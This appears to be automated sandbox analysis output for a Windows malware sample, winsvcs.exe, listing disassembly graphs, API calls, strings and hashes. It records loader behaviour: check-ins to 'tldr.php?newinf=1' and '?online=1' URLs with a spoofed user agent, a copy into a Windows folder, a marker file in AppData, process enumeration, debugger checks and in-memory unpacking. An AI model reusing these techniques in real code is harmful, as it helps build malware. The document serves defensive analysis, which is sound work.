                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00402DE8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DriveSleepmemset$Type$ErrorFileInformationLogicalModeModuleNameStringsVolume_wfopenfclosefseekftell
                                                                                                                                                                                                                          • String ID: C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                          • API String ID: 2588250049-2072507633
                                                                                                                                                                                                                          • Opcode ID: fc6aa94d807960d6bdd2ce83472f9c10149685f5be312d7016265bd8eaf1de08
                                                                                                                                                                                                                          • Instruction ID: abd61d0839dc9ad5a3035ce58b77fb3bf3c2ac84987508875e7d16b0c097f562
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6aa94d807960d6bdd2ce83472f9c10149685f5be312d7016265bd8eaf1de08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3418671980248BBEB10AB90EE4EF9E77B4AF04701F6000B6F504F51E1DAB85E94DB59

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 636 401cda-401cff memset 637 401d01-401d1a _snprintf 636->637 638 401d1d-401d23 636->638 637->638 639 401d41-401d61 InternetOpenA 638->639 640 401d25-401d3e _snprintf 638->640 641 401d81-401da2 Sleep InternetCloseHandle * 2 639->641 642 401d63-401d7e InternetOpenUrlA 639->642 640->639 642->641
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401CF1
                                                                                                                                                                                                                          • _snprintf.MSVCRT ref: 00401D15
                                                                                                                                                                                                                          • _snprintf.MSVCRT ref: 00401D39
                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00401D4E
                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00401D78
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00401D86
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000001), ref: 00401D8F
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401D9B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • %stldr.php?newinf=1, xrefs: 00401D04
                                                                                                                                                                                                                          • %stldr.php?online=1, xrefs: 00401D28
                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00401D49
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen_snprintf$Sleepmemset
                                                                                                                                                                                                                          • String ID: %stldr.php?newinf=1$%stldr.php?online=1$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                          • API String ID: 3400190714-2874531546
                                                                                                                                                                                                                          • Opcode ID: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
                                                                                                                                                                                                                          • Instruction ID: 172d5a9b1eb5bcf93a70bdf7b9922c54f139c7de0db3159d92bce3780515f997
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711A7B0E4031CBBEF11ABA0CD47FDA3A78AB04B04F1444B6B754B91E1D6B49A94CF59

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 643 401fac-402027 memset * 2 ExpandEnvironmentStringsW _snwprintf PathFileExistsW 644 402029-402049 _wfopen 643->644 645 40206a 643->645 646 402066-402068 644->646 647 40204b-402060 fclose SetFileAttributesW 644->647 648 40206c-40206d 645->648 646->648 647->646
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filememset$AttributesEnvironmentExistsExpandPathStrings_snwprintf_wfopenfclose
                                                                                                                                                                                                                          • String ID: %appdata%$%ls\winsvcs_.txt
                                                                                                                                                                                                                          • API String ID: 1073927619-2399589006
                                                                                                                                                                                                                          • Opcode ID: 56c3ea8311b647faa11201189d7150c577c5e7a9f844502fc65c16921bd3f9ae
                                                                                                                                                                                                                          • Instruction ID: 1a380fa9675f0f2fc8ef9a6445bbc20ecbefda1fb14ea0c07b927e82b87ac6b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56c3ea8311b647faa11201189d7150c577c5e7a9f844502fc65c16921bd3f9ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 621137B194031C66DF20EB609D0EFDB73BCAB04704F0444B6B354F60D2EAB896C48E59

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 649 40104e-4010c3 __set_app_type __p__fmode __p__commode call 4011cd 652 4010d1-401128 call 4011b8 _initterm __getmainargs _initterm 649->652 653 4010c5-4010d0 __setusermatherr 649->653 656 401164-401167 652->656 657 40112a-401132 652->657 653->652 660 401141-401145 656->660 661 401169-40116d 656->661 658 401134-401136 657->658 659 401138-40113b 657->659 658->657 658->659 659->660 662 40113d-40113e 659->662 663 401147-401149 660->663 664 40114b-40115c GetStartupInfoA 660->664 661->656 662->660 663->662 663->664 665 40115e-401162 664->665 666 40116f-401171 664->666 667 401172-40117d GetModuleHandleA call 40373e 665->667 666->667 669 401182-40119f exit _XcptFilter 667->669
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 801014965-0
                                                                                                                                                                                                                          • Opcode ID: edeebd1106a7f388a772a7060f8ac46c09a25cb8c28ec28ec07484c77bacbd7a
                                                                                                                                                                                                                          • Instruction ID: 94e1e2716a1ba341fd62adcb868f80db46b7d294d77747727738e79ab16cead9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edeebd1106a7f388a772a7060f8ac46c09a25cb8c28ec28ec07484c77bacbd7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7415CB1940744AFDB249FA4DA45AAE7BB8FB09710F20013FE681BB2A1D6785845CF58

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 670 401e97-401eb0 CreateToolhelp32Snapshot 671 401eb2-401eb4 670->671 672 401eb9-401ed4 Process32First 670->672 673 401faa-401fab 671->673 674 401ed6-401ed8 672->674 675 401edd-401ef9 CharLowerA 672->675 674->673 676 401eff-401f15 675->676 677 401f17-401f1e 676->677 678 401f5a-401f5f 676->678 679 401f20-401f38 677->679 680 401f51-401f58 677->680 681 401f65-401f78 678->681 679->678 682 401f3a-401f4f 679->682 680->681 683 401f88-401f99 Process32Next 681->683 684 401f7a-401f86 CloseHandle 681->684 682->676 682->680 683->675 685 401f9f-401fa8 FindCloseChangeNotification 683->685 684->673 685->673
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00401EA4
                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 00401ECD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2353314856-0
                                                                                                                                                                                                                          • Opcode ID: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
                                                                                                                                                                                                                          • Instruction ID: 642ac0987f55ef775eea862af307b23bb9844e3de74e62916ff785c59642b288
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B3134709002599FCF219B64CD847EABBB5AB18314F1002EAE949B62A1D7389F85DF08

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 686 40fcc0-40fd91 call 40fe50 CreatePen 689 40fd96-40fdcb 686->689 689->689 690 40fdcd-40fe44 CreateFontIndirectA GetSysColor 689->690
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreatePen.GDI32(00000000), ref: 0040FD85
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0040FE0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create$ColorFontIndirect
                                                                                                                                                                                                                          • String ID: Taho$dD
                                                                                                                                                                                                                          • API String ID: 4251253423-4141250355
                                                                                                                                                                                                                          • Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 691 429b0c-429b2e HeapCreate 692 429b32-429b3b 691->692 693 429b30-429b31 691->693
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00429B21
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                          • Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 694 2323894-23238c3 call 2323424 VirtualProtect
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 023238B7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction ID: 08a7b9baff2c096cadbc8aa9f430048f4fe2cb59e58b69867192f95db41d26bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00E07E7590020CAFCF01DF94D94589DBBB5EB08200F008199ED54A6311D6319A20EF51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction ID: 25f096fa0555684131f3f008669579ac6ba6fdf8ac01908b1af38dba58dd31b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAD04274E0420CAF8B10EFA8D54589CFBF5EB08200F1081EAEC04A7311E631AA54DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                                                                                          • Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 02323877
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: 1955a88034b233c830e439d634ba171ee265cd477c1fca3a199eedca0ddd729b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFE07E7590020CAFCF01DF94D94589DBBB5EB08210F00809AED14A6311D6319A20EF51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 02320593
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2320000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: 8803953e8d309987c8e4462516c58ebaae07c227b49a507c8bb40378569f6afd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE07E7590020CAFCF05DF98D94589DBBB5EB08310F00809AED14A6211D6319A24AF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02323844
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: 67b608e004bc8f7c02685251dc1f56c87c3a45970fd000a210b671ab7df54968
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35E09275D0020CEF8F01DF94D84589CBBB5EB08210F008099EC14A7310D6319A60DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02320560
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2320000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: b6ecc2184bb6200fa674f2b11a1be03881e0ff84738faec177bf9e40ee607bda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7E00275D4020CEF8B05DF98D94599DBBB5EB18310F10819AED1497311D6319A64DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 02323781
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4806748587.0000000002323000.00000040.00001000.00020000.00000000.sdmp, Offset: 02323000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2323000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction ID: dc0da760ebe54f30e3be3d7d24c8f27b89beae46dc73ccdb8187a7f08e55289f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E02D79E0420CAF8B51EFA8D54589CFBB5EB08210F1081AAEC58A7311E631AA64DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0042EDA1
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDB6
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00440498), ref: 0042EDC1
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDDD
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 0042EDE4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                          • Opcode ID: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
                                                                                                                                                                                                                          • Instruction ID: 23f69739ab82ab60ae37d22de6363e677c78d496a800df86a2d8b411d35bdd9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA21E0BC9042449FE711DF69FC496497BA0FB4A310F80107AE50997BA5E7B4A984CF8D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401371
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00401395
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 004013B0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                          • String ID: !$0$=$@$R$a$r$s$t${$4@
                                                                                                                                                                                                                          • API String ID: 1378416451-1478285898
                                                                                                                                                                                                                          • Opcode ID: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
                                                                                                                                                                                                                          • Instruction ID: 3aa843619d31d418073711cef59783edf8e6a9b44ca045ba224e396693470445
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02B12A31904268EEEF219B64DD09B9EBBB5BF04304F0441E6E24CBA1E1DB751E84DF69
